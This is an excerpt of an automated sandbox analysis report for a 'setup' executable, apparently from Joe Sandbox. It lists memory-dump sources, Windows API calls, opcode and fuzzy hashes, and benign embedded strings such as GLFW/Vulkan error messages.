                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassDestroyIconLongMessageMetricsSendSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2716883340-0
                                                                                                    • Opcode ID: cd169fb5f591a62869551b124a149699408fff3be02288dc28fe00b5f096b392
                                                                                                    • Instruction ID: 8da4d663faee093aefb81b8224ece2295af819f6338db34ed2a79647941f6a6b
                                                                                                    • Opcode Fuzzy Hash: cd169fb5f591a62869551b124a149699408fff3be02288dc28fe00b5f096b392
                                                                                                    • Instruction Fuzzy Hash: 3E511EB0A143018FD708EF78D58431ABBF4AF85750F01892DE8D98B395DBB4E8598BC2
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strstr
                                                                                                    • String ID: <stdin>$ <stdout>$MemoryBarrierCompression?$MemoryBarrierDecompression?$external?$nosolid?
                                                                                                    • API String ID: 1392478783-1920293649
                                                                                                    • Opcode ID: b3dde93d58d9ae6286d8a590fa1cb82135c3d983062e36557744260abf6656db
                                                                                                    • Instruction ID: 6fbdea63e23527498feb06f4224c6a8385c4d3465e48b8649def9cd307b97f60
                                                                                                    • Opcode Fuzzy Hash: b3dde93d58d9ae6286d8a590fa1cb82135c3d983062e36557744260abf6656db
                                                                                                    • Instruction Fuzzy Hash: 0A212936B053084BE3158E6AE5C03BBB7E1EBC4361F14853EEB4887341E3368C549B51
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Charfreemalloc$longjmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1744327547-0
                                                                                                    • Opcode ID: 17f032bf109b550af1c42398ca46906e98141c0fdd1a0cafcf805ff0553c3eaa
                                                                                                    • Instruction ID: b648b73c75e80aa4439a56e7496561f479d1ce11665f5f4658aa7c8f5241992b
                                                                                                    • Opcode Fuzzy Hash: 17f032bf109b550af1c42398ca46906e98141c0fdd1a0cafcf805ff0553c3eaa
                                                                                                    • Instruction Fuzzy Hash: 03213AB19087149FCB10BF69E94539EBBE0FF08309F02486DE5C9A7202E774A844CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00277B60: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,7763E820), ref: 00277B79
                                                                                                      • Part of subcall function 00275C00: GetTickCount64.KERNEL32 ref: 00275C1D
                                                                                                      • Part of subcall function 00275C00: WaitForMultipleObjects.KERNEL32 ref: 00275C57
                                                                                                    • ResetEvent.KERNEL32 ref: 00274CCC
                                                                                                      • Part of subcall function 00277F00: TlsGetValue.KERNEL32 ref: 00277F1B
                                                                                                    • WaitForSingleObject.KERNEL32 ref: 00274D4F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ValueWait$Count64EventMultipleObjectObjectsResetSingleTick
                                                                                                    • String ID: (
                                                                                                    • API String ID: 3964425290-3887548279
                                                                                                    • Opcode ID: c655119f9f21e14274e7f3d99ff9f5eddbc9df4e36316328649345474cbb8dc6
                                                                                                    • Instruction ID: cbe58811cfe8dfcbe906472af173d823f6da715e3942b47563ebd695d680e5b4
                                                                                                    • Opcode Fuzzy Hash: c655119f9f21e14274e7f3d99ff9f5eddbc9df4e36316328649345474cbb8dc6
                                                                                                    • Instruction Fuzzy Hash: 4D518B316283068BE7307E65AA8532FB6E4AF41355F10C83EEE8C86281E775C8649B53
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strchr
                                                                                                    • String ID: :/\
                                                                                                    • API String ID: 2830005266-2793184486
                                                                                                    • Opcode ID: 98d31227aa4cb107d2a483d8bf560bd602cdbe2eefb03e1a203d8f960e0b88e4
                                                                                                    • Instruction ID: 919aa39ef0daaf506e1df0a9bcffaf91447692f05cd746e28834051f029395ec
                                                                                                    • Opcode Fuzzy Hash: 98d31227aa4cb107d2a483d8bf560bd602cdbe2eefb03e1a203d8f960e0b88e4
                                                                                                    • Instruction Fuzzy Hash: C8418EB46087918FD724DF29C04436EBBE5BB84740F59892EE5C98B381D37AC949DF82
                                                                                                    APIs
                                                                                                      • Part of subcall function 00215719: EnterCriticalSection.KERNEL32(00359260,0023BF27,?,00000000,00000000,?,?,0023C461,0023C74F,00000003,00000010,0023C74F,00000010,BASS/2.4,00000000), ref: 0021571E
                                                                                                    • SetEvent.KERNEL32(?,00000000,00000000,00000000,?,00000000,00230B5A,?,00000000,00000000,?,002370C5,00000000,00000000,774D3050,002371B4), ref: 0023094F
                                                                                                    • memmove.MSVCRT(00000000,00000008,?,00000000,00000000,00000000,?,00000000,00230B5A,?,00000000,00000000,?,002370C5,00000000,00000000), ref: 002309D9
                                                                                                    • timeGetTime.WINMM(002371B4,774D30D0,001C7C8E), ref: 002309F4
                                                                                                    • Sleep.KERNEL32(?), ref: 00230A1C
                                                                                                    • DeleteCriticalSection.KERNEL32(000012B0,00000000,002371B4,774D30D0,001C7C8E), ref: 00230A60
                                                                                                    • DeleteCriticalSection.KERNEL32(000012C8), ref: 00230A69
                                                                                                    • DeleteCriticalSection.KERNEL32(000012E0), ref: 00230A72
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Delete$EnterEventSleepTimememmovetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2815438310-0
                                                                                                    • Opcode ID: 52ca9c1e1386cd33020ceab1277d2b1c79dfea5d90495cd215641e81c4387565
                                                                                                    • Instruction ID: 1b6b07dc7d3326429f7f6e0a715696f0cf6be268c5c90a31728e598cbc393656
                                                                                                    • Opcode Fuzzy Hash: 52ca9c1e1386cd33020ceab1277d2b1c79dfea5d90495cd215641e81c4387565
                                                                                                    • Instruction Fuzzy Hash: B54103B5620712DFCB20AFB8E8D59AA73E9BB45305B04452DF146C7213DB31E862CF61
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32 ref: 0025006B
                                                                                                      • Part of subcall function 0023F1D0: strcpy.MSVCRT ref: 0023F235
                                                                                                    Strings
                                                                                                    • vkCreateWin32SurfaceKHR, xrefs: 0025001A
                                                                                                    • Vulkan: Window surface creation requires the window to have the client API set to GLFW_NO_API, xrefs: 002452D0
                                                                                                    • Vulkan: Window surface creation extensions not found, xrefs: 00245306
                                                                                                    • Win32: Vulkan instance missing VK_KHR_win32_surface extension, xrefs: 002500D1
                                                                                                    • Win32: Failed to create Vulkan surface: %s, xrefs: 002500B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModulestrcpy
                                                                                                    • String ID: Vulkan: Window surface creation extensions not found$Vulkan: Window surface creation requires the window to have the client API set to GLFW_NO_API$Win32: Failed to create Vulkan surface: %s$Win32: Vulkan instance missing VK_KHR_win32_surface extension$vkCreateWin32SurfaceKHR
                                                                                                    • API String ID: 122033455-433542675
                                                                                                    • Opcode ID: 00e773cee9254d145b5fa15f4dbed01aa86db5ce1744e00cf6367097bfc3adca
                                                                                                    • Instruction ID: 4681542e2c196ecdc995010d630e08f1d112e54c63147481a0c18099a7613977
                                                                                                    • Opcode Fuzzy Hash: 00e773cee9254d145b5fa15f4dbed01aa86db5ce1744e00cf6367097bfc3adca
                                                                                                    • Instruction Fuzzy Hash: 6B4137B56193009FD340AF29E98472BBBE0FF89354F444A2EF8C887355D3B598548F96
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoWindow$LongParametersSystem$ExecutionMonitorStateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1635594411-0
                                                                                                    • Opcode ID: f56b611a0d44493700e05970e17bd0525526dba8921ce2f8c416d873d5ebc8a8
                                                                                                    • Instruction ID: d055c312637c54e5de8499e6c187847e74be2329e50671ce1a502c1646f987fd
                                                                                                    • Opcode Fuzzy Hash: f56b611a0d44493700e05970e17bd0525526dba8921ce2f8c416d873d5ebc8a8
                                                                                                    • Instruction Fuzzy Hash: B641F2B55187019FD714EF68D68831ABBF0BF85310F11892DE8998B356D7B4D848CF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Invalid window opacity %f, xrefs: 002466B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: Invalid window opacity %f
                                                                                                    • API String ID: 1378638983-3510817985
                                                                                                    • Opcode ID: 9aff7c4a7f2e4eb7bc4422eb204717b89fc612d1433858d34c81accc878bfc7f
                                                                                                    • Instruction ID: 02378a899290b9295aa2fd64aea815c9f6ddf849e2251929d2b3ea1808bea60d
                                                                                                    • Opcode Fuzzy Hash: 9aff7c4a7f2e4eb7bc4422eb204717b89fc612d1433858d34c81accc878bfc7f
                                                                                                    • Instruction Fuzzy Hash: 28318BB19083029FC701BF28DA8921ABBF4FB85741F504D2DF8C48A299E7758868CB57
                                                                                                    APIs
                                                                                                    • GetMonitorInfoW.USER32 ref: 0024CED6
                                                                                                    • SetWindowPos.USER32 ref: 0024CF1C
                                                                                                    • SetThreadExecutionState.KERNEL32 ref: 0024D057
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475D9
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475F5
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 00247611
                                                                                                    • SystemParametersInfoW.USER32 ref: 0024D0A9
                                                                                                    • SystemParametersInfoW.USER32 ref: 0024D0CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConditionInfoMask$ParametersSystem$ExecutionMonitorStateThreadWindow
                                                                                                    • String ID: (
                                                                                                    • API String ID: 346400206-3887548279
                                                                                                    • Opcode ID: 85dace093160a458e3ce95bd8141bff586bdcf693ecd709605e6c76c5047f66d
                                                                                                    • Instruction ID: 6b776a06c2df0ae06383b1a3df1f4eaebad797b3bc39f52f136afc46cc0668f5
                                                                                                    • Opcode Fuzzy Hash: 85dace093160a458e3ce95bd8141bff586bdcf693ecd709605e6c76c5047f66d
                                                                                                    • Instruction Fuzzy Hash: F131E5B55097018FD704EF28D58831ABBE0FF84311F10892EE8988B351D779D848CF82
                                                                                                    APIs
                                                                                                      • Part of subcall function 0032DDA0: malloc.MSVCRT ref: 0032DDB5
                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F52B
                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F544
